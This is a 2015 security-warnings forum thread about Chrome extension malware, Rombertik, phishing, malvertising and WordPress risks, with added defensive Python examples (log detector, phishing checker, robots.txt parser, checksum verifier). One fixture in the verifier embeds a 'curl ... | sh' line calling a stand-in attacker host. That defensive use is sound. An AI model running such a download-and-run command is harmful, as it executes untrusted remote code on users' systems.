Besides, the normal user with a simple text-only info website will become an endangered species, and implementation of SSL and certification could be a costly exercise for non-commercial websites, so we will finally land where they were aiming at, that is a situation where we can only welcome big(ger) commercial websites, and we might lose the Interwebs for everyone and all else (bloggers, alternative info sites, etc. etc.). When my prediction comes true, do not say in the aftermath that I did not warn in advance of what is about to materialize.... :D Or all will adopt a more secure HTTPS protocol. Then there is still a lot of work to be done. We will see where it leads.
Here the situation on SSL as it presents itself to-day from SSL-Pulse: https://www.trustworthyinternet.org/ssl-pulse/
Over 114.000 sites with inadequate security. Only 22.1% were found to be secure!
polonus
-
Definitely time to leave Chrome for something more secure
That is why I choose Firefox, because it gives me more control and is more secure than Chrome, and I've heard most people prefer Firefox, with much better options, and they always keep the browser software up to date.
-
Back when Firefox was on 3.x I wasn't too fond of it because I found it clunky and slow compared to Chrome, but since its more recent releases a lot has changed.
-
Definitely time to leave Chrome for something more secure
Agreed.
-
Definitely time to leave Chrome for something more secure
Should avast! now be considering offering Chrome, not just offering it but having it as an opt-out option.
-
Definitely time to leave Chrome for something more secure
Should avast! now be considering offering Chrome, not just offering it but having it as an opt-out option.
+1 Good question.
-
Definitely time to leave Chrome for something more secure
Agreed.
Chrome isn't any less secure than it was before the tool that was cracked ever came into existence.
It was a tool designed to make phishing exploits less likely.
I think someone is jumping the gun ???
-
Unfortunately Chrome has now become very easy to subvert; so far about 60% of the infections that I handle on Chrome necessitate a full uninstall/re-install to cure the problem, as malware is now using the same ID as Google store Chrome apps. The only way to determine if it is legitimate is to do a file by file scan; however, where the normal number of extensions is about 10, the files to be looked at are just too much to realistically expect anyone to look at. So remove it all and re-install is the quickest option. The problem is increasing and not reducing.
-
Well this extension might help: chrome-extension://lkakdehcmmnojcdalpkfgmhphnicaonm/options.html
Extension Defender
Scan your installed extensions for adware, malware, or tracking extensions.
Mine are all genuine and above board - Google should do some cleansing again.
But I agree, we see loads of these uninstall-reinstall routines performed by essexboy because of Google Chrome compromises.
That browser needs hardening. And because of the all Google services integration the browser has become more and more vulnerable. Marketing as a first priority and user security as a last resort issue. :(
polonus
-
Tech Support Scam Source Code Found on GitHub
https://blog.malwarebytes.org/fraud-scam/2015/05/tech-support-scam-source-code-found-on-github/?utm_source=Gplus&utm_medium=social
-
So we are talking about installing unsafe add-ons. The same problem we had not long ago in Firefox.
It's the add-ons that are the problem, and maybe folks need to be careful what they add to their browser regardless of the browser they use.
-
Unfortunately the fake ones are available in the chrome store, currently helping some one with this problem and having cleaned him up once he downloaded an adblocker from chrome store.... now re-infected
In Chrome settings there is a message at the top:
"Chrome detected that some of your settings were corrupted by another program and reset them to their original defaults. Learn more" and if you click on extensions, get more extensions, the Chrome plug-in/app store still has a mixture of bogus and, I think, genuine plug-ins listed. E.g. BetaFish AdBlocker comes up if you search for ad blocker, and googling that it looks like it is genuine, but above it is a fake adblocker app where the listing is all ungrammatical, e.g.: "Uses more than 50 million people, free for chrome that blocks all ads and pests is an ad blocker"
-
Hi bob3160,
That is exactly the problem that Google needs to adjust. They need to cleanse shop from junkware that will compromise the Google Chrome Browser settings beyond repair. Junkware remover does a good job of finding this malcode initially, but Google has to keep these criminals out of their install store.
Read here: http://tech.slashdot.org/story/15/04/09/2043226/google-is-too-slow-at-clearing-junkware-from-the-chrome-extension-store
Damian
P.S. Some page capturing extensions were spying on users and I had to change mine for FireShot.
Read: http://betanews.com/2015/04/08/google-is-too-slow-at-clearing-crap-from-the-chrome-extension-store/
Quote: Google is quick to point out that malicious ad injectors are not specific to Chrome -- they can also be found in Firefox and Internet Explorer. The company says: "We don’t ban injectors altogether -- if they want to, people can still choose to install injectors that clearly disclose what they do -- but injectors that sneak ads into a user’s browser would certainly violate our policies".
-
Chrome may not be my default browser but, I do use it. I'm also quite certain that the extensions installed on both chrome and Firefox are equally safe.
It is still the user that needs to be educated and, that has always been the problem with almost all compromises.
-
Hi bob3160,
Browsing "in the nude" as FwF puts this so eloquently, has always been a problem and creates problems as well. Users need to check their browser extensions and plug-ins, their clicks, use some form of in-browser protection, like an adblocker, script blocker, and check on all things they thoughtlessly may install. I am also out on Google Chrome (in sandboxie) but I haven't encountered any problem yet, but there are certain places and clicks I will shun. When I do not know where I am heading, I perform a decent pre-scan and my downloads enter a Metascan online pre-scan first (I will survive the couple of extra secs this costs and I know "my OS and browser will thank me for this").
polonus
-
Hi bob3160,
Browsing "in the nude" as FwF puts this so eloquently, has always been a problem and creates problems as well. Users need to check their browser extensions and plug-ins, their clicks, use some form of in-browser protection, like an adblocker, script blocker, and check on all things they thoughtlessly may install. I am also out on Google Chrome (in sandboxie) but I haven't encountered any problem yet, but there are certain places and clicks I will shun. When I do not know where I am heading, I perform a decent pre-scan and my downloads enter a Metascan online pre-scan first (I will survive the couple of extra secs this costs and I know "my OS and browser will thank me for this").
polonus
I'm quite happy with Avast's check of the programs I download. I'm also careful what I download and where I get these downloads from.
The only reason I'm not using Chrome as the default is because of its speed. I've found Opera and Firefox to be much quicker in their response.
-
Yes, I run Avast in PUP-mode enabled also.
An example to see how some get infested: http://blog.trendmicro.com/trendlabs-security-intelligence/uncovering-malicious-browser-extensions-in-chrome-web-store/ link article author by Fernando Mercês (Trend Micro's Senior Threat Researcher)
polonus
-
Is it true that Google Chrome coders cannot code in a secure way anymore?
"Security that is holed is like a sieve, you cannot get it back to solid anymore": https://twitter.com/securifybv/status/594403213882818560
A real cat and mouse game has started, upgraded Google Password Alert extension
for Google Chrome to version 1.6 and already again circumvented.
polonus
-
When we heard one side of the story, we should also hear the other:
http://blog.360totalsecurity.com/en/qihoo-360-statement-regarding-cheating-in-lab-test/
polonus
-
When we heard one side of the story, we should also hear the other:
http://blog.360totalsecurity.com/en/qihoo-360-statement-regarding-cheating-in-lab-test/
polonus
We already have, as this link was in the forums a couple of days ago.
-
When we heard one side of the story, we should also hear the other:
http://blog.360totalsecurity.com/en/qihoo-360-statement-regarding-cheating-in-lab-test/
polonus
As I stated in the other thread, when all else fails, blame the other guy.....
-
@DavidR,
Very good for these forums that was how it was presented in the other thread, always give two sides of a story, so the reader can make up his own mind.
@bob3160,
I see a lot of fingers pointing at each other. ;D
D
-
@DavidR,
Very good for these forums that was how it was presented in the other thread, always give two sides of a story, so the reader can make up his own mind.
It was, as the very link that you posted has previously been posted, so we have seen their rebuttal: the 3rd party BitDefender engine is disabled by default because they feel it may be too much for older/user systems. But it is fine to enable it in a test version.
When AV Comparatives gave their write up, it mentioned that there were substantial differences between the two versions. To me that sounds much more than the 3rd party engine just being disabled in the user available version.
-
@DavidR,
I wonder if we ever get anywhere near what really went on.
polonus
-
Fiesta EK Wreaks Havoc on Popular Torrent Site
https://blog.malwarebytes.org/exploits-2/2015/05/fiesta-ek-wreaks-havoc-on-popular-torrent-site/?utm_source=Gplus&utm_medium=social
-
What is wrong with the privacy policy of the AnonymoX Extension for firefox and Google Chrome?
Read about it here: http://www.wilderssecurity.com/threads/anonymox-firefox-extension.308582/
Anyone?
polonus
-
I've been having a problem with Surveillance.Reset-local-password-pro. This started about a month ago and I can't get rid of it. I thought that is why I bought this program last November?? Help, please! I'm a business! :'(
-
I've been having a problem with Surveillance.Reset-local-password-pro. This started about a month ago and I can't get rid of it. I thought that is why I bought this program last November?? Help, please! I'm a business! :'(
Start a new topic in V&W and post your logs there: https://forum.avast.com/index.php?action=post;board=4.0
-
A bug revealed that MS does not want to patch: http://googleprojectzero.blogspot.nl/2015/05/in-console-able.html
Read about the unfixed bug here: https://code.google.com/p/google-security-research/issues/detail?id=213
polonus
-
Rombertik, dangerous password stealing malware that ruins the MBR: http://blogs.cisco.com/security/talos/rombertik
link article was authored by Ben Baker and Alex Chiu.
polonus
-
Computer Science > Cryptography and Security
A New Covert Channel over Cellular Voice Channel in Smartphones
http://arxiv.org/abs/1504.05647
PDF: http://arxiv.org/ftp/arxiv/papers/1504/1504.05647.pdf
-
Rombertik, dangerous password stealing malware that ruins the MBR: http://blogs.cisco.com/security/talos/rombertik
link article was authored by Ben Baker and Alex Chiu.
polonus
More on this...
Rombertik malware wipes hard drives to prevent detection
http://www.zdnet.com/article/rombertik-malware-wipes-hard-drives-to-prevent-detection/
Threat Spotlight: Rombertik – Gazing Past the Smoke, Mirrors, and Trapdoors
http://blogs.cisco.com/security/talos/rombertik
-
This Carding Forum is Spamtacular
https://blog.malwarebytes.org/fraud-scam/2015/05/this-carding-forum-is-spamtacular/?utm_source=Gplus&utm_medium=social
-
Adware a big, big problem: http://www.theverge.com/2015/5/6/8557843/google-adware-survey-ad-injectors-security-malware
link article author = By Russell Brandom
polonus
-
Always the same small circle of malvertising ad-injecting abusers.
Quote from Google: A small number of software developers support the vast majority of these injectors who in turn syndicate from the larger ad ecosystem. We have contacted the Chrome Web Store and the advertisers targeted by ad injectors to alert each of the deceptive practices involved.
polonus
-
Another critical update for WordPress: https://wordpress.org/news/2015/04/wordpress-4-2-1/
What are the most prevalent WP security risks, as I know them from my third party cold reconnaissance scanning?
WordPress Plugins check against the latest versions. Plugins are a source of many security vulnerabilities within WordPress installations; always keep them updated to the latest version available and check the developer's plugin page for information about security related updates and fixes.
WordPress Theme
The theme has been found by examining the path /wp-content/themes/ *theme name* /
For instance: twentyeleven
While plugins get a lot of attention when it comes to security vulnerabilities, themes are another source of security vulnerabilities within WordPress installations; always keep them updated to the latest version available and check the developer's theme page for information about security related updates and fixes.
Warning User Enumeration is possible
The first two user ID's were tested to determine if user enumeration is possible.
For instance on this website:
User ID 1 : speedrider
User ID 2 : None
It is recommended to rename the admin user account to reduce the chance of brute force attacks occurring. As this will reduce the chance of automated password attackers gaining access. However it is important to understand that if the author archives are enabled it is usually possible to enumerate all users within a WordPress installation.
Only the first two user ID's were tested
Directory Indexing
Directory indexing was tested on the /wp-content/uploads/ and /wp-content/plugins/ directories. It does not seem to be possible to list the directory contents using this method. Note that other directories may have this web server feature enabled, so ensure you check other folders in your installation. It is good practice to ensure directory indexing is disabled for your full WordPress installation, either through the web server configuration or .htaccess.
Compare to linked sites and linked Javascripts Scan - Quote Info Credits go to WordPress Security Scan.
polonus
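Seen from the server side, the two findings above (user enumeration through author archives, directory indexing under /wp-content/) also leave traces in the web server's own access log, which is where a site owner can watch for them. The script below is an added example, not code from the post or from WordPress Security Scan; the log lines are constructed in combined log format with documentation IP addresses, and it assumes WordPress's behaviour of answering `?author=N` with a 301 to the author archive when that archive exists.

```python
"""Flag WordPress user-enumeration sweeps and exposed directory listings in an access log.

Added example, not from the post or from WordPress Security Scan. Log lines are
constructed (combined log format, RFC 5737 documentation addresses). The checks
mirror the two findings in the post: ?author=N requests that WordPress answers
with a 301 to the author archive (leaking the username in Location) and a bare
/wp-content/ directory that the web server answers with a 200 listing.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample: one enumeration sweep, one listing probe, one normal visitor.
SAMPLE_LOG = """\
203.0.113.7 - - [10/May/2015:10:00:01 +0000] "GET /?author=1 HTTP/1.1" 301 0
203.0.113.7 - - [10/May/2015:10:00:02 +0000] "GET /?author=2 HTTP/1.1" 301 0
203.0.113.7 - - [10/May/2015:10:00:02 +0000] "GET /?author=3 HTTP/1.1" 404 1234
203.0.113.7 - - [10/May/2015:10:00:03 +0000] "GET /?author=4 HTTP/1.1" 301 0
198.51.100.9 - - [10/May/2015:10:05:00 +0000] "GET /wp-content/uploads/ HTTP/1.1" 200 5120
198.51.100.9 - - [10/May/2015:10:05:01 +0000] "GET /wp-content/plugins/ HTTP/1.1" 403 199
192.0.2.44 - - [10/May/2015:10:07:00 +0000] "GET /2015/05/hello-world/ HTTP/1.1" 200 8800
192.0.2.44 - - [10/May/2015:10:07:05 +0000] "GET /?author=1 HTTP/1.1" 301 0
"""

AUTHOR_SWEEP_THRESHOLD = 3  # distinct author IDs from one client before it counts as a sweep
LISTING_DIRS = ("/wp-content/uploads/", "/wp-content/plugins/", "/wp-content/themes/")


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def author_ids(rec):
    """Numeric ?author= values in the request, if any."""
    query = parse_qs(urlsplit(rec["path"]).query)
    return [int(v) for v in query.get("author", []) if v.isdigit()]


def author_sweeps(lines):
    """{ip: sorted author IDs} for clients that probed at least the threshold of distinct IDs."""
    seen = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec:
            seen[rec["ip"]].update(author_ids(rec))
    return {ip: sorted(ids) for ip, ids in seen.items() if len(ids) >= AUTHOR_SWEEP_THRESHOLD}


def author_redirects(lines):
    """Number of ?author=N requests answered 301: each one handed out a username."""
    count = 0
    for line in lines:
        rec = parse_line(line)
        if rec and rec["status"] == 301 and author_ids(rec):
            count += 1
    return count


def exposed_listings(lines):
    """(ip, path) for bare wp-content directories answered 200, i.e. an index listing was served."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec and rec["status"] == 200 and urlsplit(rec["path"]).path in LISTING_DIRS:
            hits.append((rec["ip"], rec["path"]))
    return hits


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    print("sweeps:", author_sweeps(lines))
    print("usernames handed out via 301:", author_redirects(lines))
    print("listings served:", exposed_listings(lines))
```

A non-zero `author_redirects` count means the site is still answering the enumeration, whatever the admin account is called; a hit in `exposed_listings` means the "Directory Indexing" fix (web server config or .htaccess) has not taken effect for that folder.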
-
What’s important about Rombertik?
https://blog.malwarebytes.org/security-threat/2015/05/whats-important-about-rombertik/?utm_source=Gplus&utm_medium=social
-
Look out for PUPs claiming to be GOG Galaxy Client
https://blog.malwarebytes.org/fraud-scam/2015/05/look-out-for-pups-claiming-to-be-gog-galaxy-client/?utm_source=Gplus&utm_medium=social
-
Cisco UCS Central Software Arbitrary Command Execution Vulnerability
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150506-ucsc
-
Passwords from hacked WordPress websites stolen in malware campaign:
http://research.zscaler.com/2015/05/compromised-wordpress-sites-leaking.html
Link site Analysis by - Sameer Patil & Deepen Desai
polonus
-
You just can't trust advertisers anymore!
https://blog.malwarebytes.org/malvertising-2/2015/05/malvertising-strikes-on-dozens-of-top-adult-sites/?utm_source=Gplus&utm_medium=social
-
Hi Para-Noid,
WOT has two reds for this: cs.adxpansion dot com: https://www.mywot.com/en/scorecard/cs.adxpansion.com
several negative WOT user reports as well.
Webutation also flags: https://www.virustotal.com/nl/url/40801dedf9be8615fc82d1429aa2f1a688938f40457cef028d3e472ccdea824b/analysis/
See: http://cookiepedia.co.uk/host/cs.adxpansion.com
See the IP and server mitigation here: http://toolbar.netcraft.com/site_report?url=cs.adxpansion.com
Service = tcpwrapped - TCP Wrapper is a client side software solution for Linux/BSD machines which provides firewall features. It monitors all incoming packets to the machine and if an external node attempts to connect, the software checks to see if the node is authorized based on various criteria you can specify (80/tcp connection)
Hosted: http://www.dnsinspect.com/gammanetworking.com/1431102021
polonus
-
Just looking for suckers!
https://blog.malwarebytes.org/fraud-scam/2015/05/your-account-paypal-has-been-limited-phishing-scam/?utm_source=gplus&utm_medium=social
That IP has a history and it's not good https://www.virustotal.com/en/ip-address/72.55.165.59/information/
Celine Dion’s Official Site Used as Spam Launchpad
https://blog.malwarebytes.org/fraud-scam/2015/05/celine-dions-official-site-used-as-spam-launchpad/?utm_source=Gplus&utm_medium=social
-
Just looking for suckers!
https://blog.malwarebytes.org/fraud-scam/2015/05/your-account-paypal-has-been-limited-phishing-scam/?utm_source=gplus&utm_medium=social
That IP has a history and it's not good https://www.virustotal.com/en/ip-address/72.55.165.59/information/
That sample screen posted in the link does have one obvious indication that it's a scam ... PayPal has made the point over and over again that it will never, ever, address you as "Dear valued customer" or other generic greeting, but will instead always address you by your full registered name of record, whether individual or enterprise.
Since surely there are ways for a scammer to get this info, they're either too dumb or too lazy to be bothered. Or maybe they're just gambling that no one ever reads PayPal's (or anyone else's) security warnings.
-
Misspellings and grammatical mistakes are also always a good give-away; things aren't what they should be, so scam.
These folks weren't very attentive at school, while they were contemplating other schemes.
polonus
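The two tells discussed in these replies (a generic greeting instead of the registered name, and sloppy spelling) plus the usual link-text/link-target mismatch can be turned into a small scoring check. This is an added example, not code from the thread, from Malwarebytes or from PayPal; the two e-mail bodies are constructed, the attacker hostname is made up, and the misspelling list is a tiny stand-in for a real spell-checker.

```python
"""Flags phishing indicators in an HTML e-mail: generic greeting, absent
recipient name, known misspellings, and anchor text whose host differs from
the href host. Sample messages are constructed, not real mail."""
import re
from html.parser import HTMLParser
from typing import List, Tuple

GENERIC_GREETINGS = ("dear valued customer", "dear customer", "dear user",
                     "dear member", "dear account holder")
# Stand-in for a spell-checker: words a phisher commonly gets wrong.
KNOWN_MISSPELLINGS = {"acount", "recieve", "verfiy", "informations", "securty"}


class _LinkCollector(HTMLParser):
    """Collect (href, visible text) for every <a> in the body."""
    def __init__(self):
        super().__init__()
        self.links: List[Tuple[str, str]] = []
        self._href = None
        self._text: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def _host(url: str) -> str:
    m = re.match(r"https?://([^/:?#]+)", url.strip(), re.I)
    return m.group(1).lower() if m else ""


def phishing_indicators(html_body: str, recipient_name: str) -> List[str]:
    """Return the indicators that fired; an empty list means none did."""
    text = re.sub(r"<[^>]+>", " ", html_body)
    lower = text.lower()
    hits = []
    if any(g in lower for g in GENERIC_GREETINGS):
        hits.append("generic greeting")
    if recipient_name.lower() not in lower:
        hits.append("recipient name absent")
    bad_words = set(re.findall(r"[a-z]+", lower)) & KNOWN_MISSPELLINGS
    if bad_words:
        hits.append("misspellings: " + ", ".join(sorted(bad_words)))
    collector = _LinkCollector()
    collector.feed(html_body)
    for href, anchor in collector.links:
        shown = _host(anchor)
        if shown and shown != _host(href):
            hits.append(f"link text shows {shown} but points to {_host(href)}")
    return hits


# Constructed samples; the attacker host is made up.
PHISH = ("<p>Dear valued customer,</p><p>Your acount has been limited. Visit "
         "<a href='http://paypal-secure.example.invalid/login'>https://www.paypal.com/signin</a> "
         "to verfiy your informations.</p>")
LEGIT = ("<p>Hello Jane Q. Public,</p><p>Your monthly statement is ready: "
         "<a href='https://www.paypal.com/myaccount'>https://www.paypal.com/myaccount</a></p>")

if __name__ == "__main__":
    for name, body in (("PHISH", PHISH), ("LEGIT", LEGIT)):
        print(name, phishing_indicators(body, "Jane Q. Public"))
```

None of these heuristics is proof on its own; a scammer who has your name defeats the greeting check, which is why the link-target comparison is the one worth teaching people to do by hand (hover, read the real host).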
-
Just looking for suckers!
https://blog.malwarebytes.org/fraud-scam/2015/05/your-account-paypal-has-been-limited-phishing-scam/?utm_source=gplus&utm_medium=social
That IP has a history and it's not good https://www.virustotal.com/en/ip-address/72.55.165.59/information/
That sample screen posted in the link does have one obvious indication that it's a scam ... PayPal has made the point over and over again that it will never, ever, address you as "Dear valued customer" or other generic greeting, but will instead always address you by your full registered name of record, whether individual or enterprise.
Since surely there are ways for a scammer to get this info, they're either too dumb or too lazy to be bothered. Or maybe they're just gambling that no one ever reads PayPal's (or anyone else's) security warnings.
Most people probably never read the privacy statement or the EULA.
-
Just now I read about this
http://www.theregister.co.uk/2015/05/07/avast_false_positive_snafu/
This was caused by users running older versions of Avast 4, 5, 6, 7 and 8. Good thing that Avast will stop and drop support for older versions of Avast at the end of this month. They should also drop support for Avast 9 aka 2014, as this same problem may also happen to users who still use Avast 2014.
-
Just now I read about this
http://www.theregister.co.uk/2015/05/07/avast_false_positive_snafu/
This was caused by users running older versions of Avast 4, 5, 6, 7 and 8. Good thing that Avast will stop and drop support for older versions of Avast at the end of this month. They should also drop support for Avast 9 aka 2014, as this same problem may also happen to users who still use Avast 2014.
Clearly you don't understand that avast 2014 and 2015 use the same virus definitions and update method. So by your thinking avast should cease support for avast 2015.
There has to be support for older versions (within reason) as not everyone updates immediately for many different and valid reasons.
-
Oh! Both Avast 2014 and 2015 use the Avast 9 server for VPS and program updates. Didn't know that. I hardly do manual updates, but didn't see the server name?
-
Oh! Both Avast 2014 and 2015 use the Avast 9 server for VPS and program updates. Didn't know that. I hardly do manual updates, but didn't see the server name?
You have to look deeper than that, as there isn't just one server used for VPS updates; one couldn't cater for the 200+ million avast users.
If you try to do a manual download of the full database you will see there are three distinct VPS databases, and there would be a different virus definitions update function to cater for the differing VPS types.
This also isn't really a security warnings & notices, things related to the avast program should go in the associated Avast Free/Pro/Premier sub forum.
-
The end of Superfish?
http://www.ghacks.net/2015/05/10/the-end-of-superfish/
-
Hacked ad-network has spread infested ads - Up to 12,500 users per day may have been affected by this threat...
http://blog.trendmicro.com/trendlabs-security-intelligence/ad-network-compromised-users-victimized-by-nuclear-exploit-kit/
Malvertising becoming more and more of a big problem -
another reason my friends to use a decent adblocker,
not only to block ads but also to block accompanying threats.
polonus
-
Security Updates Coming for Adobe Reader, Acrobat
https://threatpost.com/security-updates-coming-for-adobe-reader-acrobat/112697
http://www.theregister.co.uk/2015/05/08/adobe_reader_patch_pre_alert/
I have the latest version of Adobe Acrobat Reader DC (2015.007.20033)
It also says something about Microsoft. Here's that statement. "In January, the company announced that it was ending its Advanced Notification Service, which was a decade-long service providing customers the week before Patch Tuesday with a summary of the patches expected to be released, including the number of bulletins and affected products".
-
Crypto-ransomware found in the wild in Australia: http://www.symantec.com/connect/blogs/breaking-bad-themed-los-pollos-hermanos-crypto-ransomware-found-wild
polonus
-
Compromised .Gov Redirected to Apple ID Phish
https://blog.malwarebytes.org/fraud-scam/2015/05/compromised-gov-redirected-to-apple-id-phish/?utm_source=Gplus&utm_medium=social
-
Microsoft Security Bulletin Summary for May 2015
https://technet.microsoft.com/en-us/library/security/ms15-may.aspx
-
Jamie Oliver’s website hacked again, drops password stealer
https://blog.malwarebytes.org/exploits-2/2015/05/jamie-olivers-website-hacked-again-drops-password-stealer/?utm_source=Gplus&utm_medium=social
“WinYahoo” PUP Modifies Chrome Secure Preferences
https://blog.malwarebytes.org/intelligence/2015/05/winyahoo-pup-modifies-chrome-secure-preferences/?utm_source=Gplus&utm_medium=social
-
“WinYahoo” PUP Modifies Chrome Secure Preferences
https://blog.malwarebytes.org/intelligence/2015/05/winyahoo-pup-modifies-chrome-secure-preferences/?utm_source=facebook&utm_medium=social
-
‘Macro virus’ are back: threats of the past that will haunt us in the future
http://www.pandasecurity.com/mediacenter/malware/macro-virus-are-back-threats-of-the-past-that-will-haunt-us-in-the-future/
-
How to reduce spam in almost 40%: Follow Canada’s example
http://www.pandasecurity.com/mediacenter/news/how-to-reduce-spam-canadas-example/
-
Hej Pondus,
It would be a gigantic step in the right direction if the USA could copy such anti-spam legislation.
If Canada is able, why can't the States do this?
polonus
P.S. It has been quite some months since I received my last mail spam message thanks to Avast.
Actually I never get spam mail - I knock on wood now ;D
What is annoying though are the spam users that ask to be contacted on Skype and whom I have to block.
I think Skype security has worsened since Microsoft acquired it. >:(
D
-
Could this coming functionality be abused by malware and for global surveillance purposes?
Re: http://blogs.windows.com/msedgedev/2015/05/13/announcing-media-capture-functionality-in-microsoft-edge/
polonus
-
Hej Pondus,
It would be a gigantic step in the right direction if the USA could copy such anti-spam legislation.
If Canada is able, why can't the States do this?
polonus
P.S. It has been quite some months since I received my last mail spam message thanks to Avast.
Actually I never get spam mail - I knock on wood now ;D
What is annoying though are the spam users that ask to be contacted on Skype and whom I have to block.
I think Skype security has worsened since Microsoft acquired it. >:(
D
+1
Our government is not that smart.
The only place I get spam email is in my Yahoo account. None in Gmail nor in outlook.com
Microsoft didn't help Skype's image.
-
‘Payload tested’ browser popup via AOL’s ad network causes a scare
https://blog.malwarebytes.org/malvertising-2/2015/05/payload-tested-browser-popup-via-aols-ad-network-causes-a-scare/?utm_source=Gplus&utm_medium=social
-
Recent studies showed that a smartphone or tablet owner has an attention span of 7 seconds,
one second less than a common goldfish:
http://www.independent.co.uk/news/science/our-attention-span-is-now-less-than-that-of-a-goldfish-microsoft-study-finds-10247553.htm
link article author = Christopher Hooton
That is why I have Avast Security on my smartphone, so I need less attention span for malcode. ;D
polonus
-
Polonus, I saw that today on the news too; doesn't surprise me. Everywhere you go people are looking at their phone every 30 seconds, people at sporting events spending more time on their phone than watching the game. I'm an old fart, stuff like this just baffles me, what's this world coming to? Seems like people would rather interact with a device than real people.
-
Beware of GTA 5 Mods Containing Malware
https://blog.malwarebytes.org/security-threat/2015/05/beware-of-gta-5-mods-containing-malware/?utm_source=Gplus&utm_medium=social
-
Known as a security risk for quite a long time, and still exploitable; good that it is stressed again as a risk:
http://xn--thibaud-dya.fr/robots.txt.html
(link article author = fr. thiébaud).
polonus
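The risk the linked article stresses is that robots.txt is a public list of the paths an operator least wants crawled, which makes it a recon file for an attacker. The parser below is an added example, not code from the article or the post; the sample robots.txt is constructed and the keyword list is a deliberately short heuristic.

```python
"""Parses robots.txt into per-agent Disallow lists and picks out the paths
whose names hint at sensitive content. The sample file is constructed."""
from typing import Dict, List

# Heuristic hints only; a real engagement would feed these paths to a crawler.
SENSITIVE_HINTS = ("admin", "backup", "config", "private", "login", "upload", ".git", "tmp")


def parse_robots(text: str) -> Dict[str, List[str]]:
    """Return {user-agent: [disallowed paths]}; one group may name several agents."""
    groups: Dict[str, List[str]] = {}
    agents: List[str] = []
    disallows: List[str] = []

    def flush() -> None:
        for agent in agents:
            groups.setdefault(agent, []).extend(disallows)

    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # strip comments
        if not line:
            continue
        name, _, value = line.partition(":")
        name, value = name.strip().lower(), value.strip()
        if name == "user-agent":
            if disallows:                             # a new group begins
                flush()
                agents, disallows = [], []
            agents.append(value)
        elif name == "disallow" and value:
            disallows.append(value)
    flush()
    return groups


def interesting_paths(groups: Dict[str, List[str]]) -> List[str]:
    """Disallowed paths, across all agents, that match a sensitivity hint."""
    return sorted({p for paths in groups.values() for p in paths
                   if any(h in p.lower() for h in SENSITIVE_HINTS)})


SAMPLE_ROBOTS = """# constructed example, not from any real site
User-agent: *
Disallow: /wp-admin/
Disallow: /backup/
Disallow: /cgi-bin/
Allow: /wp-admin/admin-ajax.php

User-agent: Googlebot
Disallow: /private-reports/
"""

if __name__ == "__main__":
    groups = parse_robots(SAMPLE_ROBOTS)
    print(groups)
    print(interesting_paths(groups))   # ['/backup/', '/private-reports/', '/wp-admin/']
```

The defensive conclusion is the one the article draws: robots.txt is not an access control, so anything listed there must also be protected by authentication or server configuration.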
-
UK rewrites law secretly for a more convenient outcome: https://privacyinternational.org/?q=node/584
polonus
-
Check your sources! Trojanized open source SSH software used to steal information
http://www.symantec.com/connect/blogs/check-your-sources-trojanized-open-source-ssh-software-used-steal-information
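"Check your sources" in practice means comparing what you downloaded against the digest the publisher lists. The verifier below is an added example, not code from Symantec or from any SSH project; the archive bytes and the SHA256SUMS text are constructed in memory so it runs offline.

```python
"""Verifies a downloaded file against a publisher's SHA256SUMS listing
(the 'hash  filename' format written by sha256sum). Everything here is
constructed: no real project's artefacts or digests are used."""
import hashlib
import hmac
from typing import Dict

HEX = set("0123456789abcdef")


def parse_sha256sums(text: str) -> Dict[str, str]:
    """Parse 'digest  filename' lines; tolerate the '*' binary-mode marker."""
    sums: Dict[str, str] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        digest, _, name = line.partition(" ")
        digest, name = digest.lower(), name.strip().lstrip("*")
        if len(digest) != 64 or not set(digest) <= HEX:
            raise ValueError(f"malformed digest for {name!r}")
        sums[name] = digest
    return sums


def sha256_hex(data: bytes) -> str:
    """Chunked hashing, as you would do over a large file object."""
    h = hashlib.sha256()
    for i in range(0, len(data), 65536):
        h.update(data[i:i + 65536])
    return h.hexdigest()


def verify(name: str, data: bytes, sums: Dict[str, str]) -> bool:
    """Constant-time compare; a file missing from the listing fails, it does not pass."""
    expected = sums.get(name)
    if expected is None:
        return False
    return hmac.compare_digest(sha256_hex(data), expected)


# Constructed artefact, a tampered copy, and the listing for the genuine one.
GENUINE = b"#!/bin/sh\necho 'stand-in for an ssh client tarball'\n"
TAMPERED = GENUINE + b"curl http://attacker.invalid/payload | sh\n"
SHA256SUMS = f"{sha256_hex(GENUINE)}  ssh-client.tar.gz\n"

if __name__ == "__main__":
    sums = parse_sha256sums(SHA256SUMS)
    print(verify("ssh-client.tar.gz", GENUINE, sums))   # True
    print(verify("ssh-client.tar.gz", TAMPERED, sums))  # False
```

A digest only helps if it comes from somewhere the attacker could not also edit: a mirror that serves a trojanized build can serve a matching SHA256SUMS beside it, so fetch the listing from the upstream project or, better, check its detached signature.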
-
Bitly Imitation Leads to Malware Download
https://blog.malwarebytes.org/security-threat/2015/05/bitly-imitation-leads-to-malware-download/?utm_source=gplus&utm_medium=social
-
The Logjam Attack
https://weakdh.org
several weaknesses in how Diffie-Hellman key exchange has been deployed
yet another TLS exploit ...
-
More on "The Logjam Attack: What You Need to Know"
https://blog.malwarebytes.org/security-threat/2015/05/the-logjam-attack-what-you-need-to-know/?utm_source=Gplus&utm_medium=social
Screech! Grand Theft Auto V malware mods warning
http://www.theregister.co.uk/2015/05/18/gta_malware_mods_warning/ (posted by avast on Google+)
-
Why downgrading SSL to better decrypt export encryption was a very bad idea after all...
The aftermath of the crypto-war threatens thousands and thousands of sites. Read: http://arstechnica.com/security/2015/05/https-crippling-attack-threatens-tens-of-thousands-of-web-and-mail-servers/
